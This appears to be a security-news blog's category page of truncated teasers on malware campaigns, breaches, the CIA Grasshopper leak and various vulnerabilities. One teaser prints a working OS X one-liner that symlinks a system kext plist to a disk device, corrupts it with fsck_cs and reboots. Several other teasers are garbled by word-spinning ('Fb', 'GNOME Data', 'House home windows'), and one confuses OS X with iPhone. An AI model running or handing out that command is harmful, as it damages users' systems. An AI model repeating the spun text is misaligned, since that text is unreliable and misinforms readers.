You Are Browsing ‘Hacking and Secruity News’ Category

Should you or anybody you understand has acquired  any Fb message with a video hyperlink despatched by anybody, don’t click on on it. Kaspersky Lab have discovered what appears to be an ongoing cross-platform marketing campaign on Fb Messenger, the place customers obtain a video hyperlink that redirects them to a faux web site, after which they attempt to lure the sufferer to put in malicious software program. Though it’s nonetheless unknown on precisely how the malware spreads, researchers consider that the spammers are utilizing...

A a German researcher identify Miles Moskopp has found a code injection that makes use of the thumbnail handler aspect within the GNOME Data. This  file supervisor that may allow hackers to run malicious code on  Linux machines. Title Unhealthy Model, this vulnerability (CVE-2017-11421) Miles has additionally  released proof-of-concept code on his weblog to exhibit the vulnerability. This new vulnerability resides in “gnome-exe-thumbnailer” — a instrument to generate thumbnails from House home windows executable recordsdata...

GameStop Corp.  is now saying  that they are  investigating reports that hackers may have siphoned credit card and customer data from its website  gamestop.com. So now if you need another reason to stay away from GameStop here is the best one yet.       “GameStop recently received notification from a third party that it believed payment card data from cards used on the GameStop.com website was being offered for sale on a website,” a company spokesman commented on the issue .   Sources think  that the compromised...

Do we need any more reasons not to trust our government, especially the CIA. Well thanks to Wiki Leaks we now have just one more reason not too and it is called Grasshopper According to the leaked information, Grasshopper framework allows the agency members to easily create custom malware. The Grasshopper framework will automatically put together the components sufficient for attacking a Windows machine, and once the target is selected the framework then puts together an installer that CIA agency members can use to install custom malware...

FBI Director James Comey offered up a little security tip: cover your webcam. This is no laughing matter, Comey said that nearly every computer in every government building has a webcam cover in order to prevent “unauthorized” people from spying on federal employees. “There’s some sensible things you should be doing, and that’s one of them. You go into any government office and we all have the little camera things that sit on top of the screen. They all have a little lid that closes down on them. You do that so that people who...

How to Hack Computer Monitors? According to the researchers, an attacker first needs to gain physical access to the monitor’s USB or HDMI port which would then help the attacker access the firmware of the display. The duo said they discovered the hack by reverse-engineering a Dell U2410 monitor, though it was not an easy process, as it took over two years. In the process, the pair found out that Dell had not implemented any security measures with regard to the process to update the display controller’s firmware, which allowed...

Recently a few white hat hackers are Integrity have been very busy hacking Uber. What they ran across is quite scary. Hackers can hack into Uber and track where you are going. To gather  information about Uber sub domains they need to do a  dns brute-force.  Possible to View Driver Waybill via Driver UUID Using the previous vulnerability they were able to test a new functionality called waybill. By crafting the request that the app sends, they then notice that it has a broken access control vulnerability that allowed them to see the...

Posted on Apr 14 2016 - 11:50pm by TekGuru
#0

  Cyber Bombs A few days ago, the US Pentagon has announced that the US Army has released “Cyber Bombs” on ISIS. What are this Bombs, is Cyber Attack is an effective strategy? What are Cyber Bombs? We don’t know what exactly are this are, but we have 3 educated guesses: Precise, Simple & Remote attacks. Precise – DDOS Attacks: “Precision DDOS” attacks, just like GBU Bombs, are probably a very accurate & advanced attacks on the ISIS IT (Information Technology) Infrastructure. DDOS –...

Did you install the latest update OS X 10.11.4? If yes, then you might vulnerable to a exploit that is so easy it can fit in one single tweet. Hacking an iphone has never been so easy. The exploit code shown below is as follows: ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot The above code actually expands to: ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX fsck_cs /dev/diskX 1>&- touch /Library/Extensions/ Reboot (adsbygoogle...

(adsbygoogle = window.adsbygoogle || []).push({}); Hackers are at it again, this time they are targeting android phones. If you receive a random text messaging asking you to click on a link you do not recognize, it will be best that you do not do so. A norwegian security firm has recently  detected a nasty piece of malware that spreads via SMS and tricks users into downloading a malicious app.  This app gains administrator rights to the device; the malware is being called Mazar Android BOT and it spreads via SMS and MMS...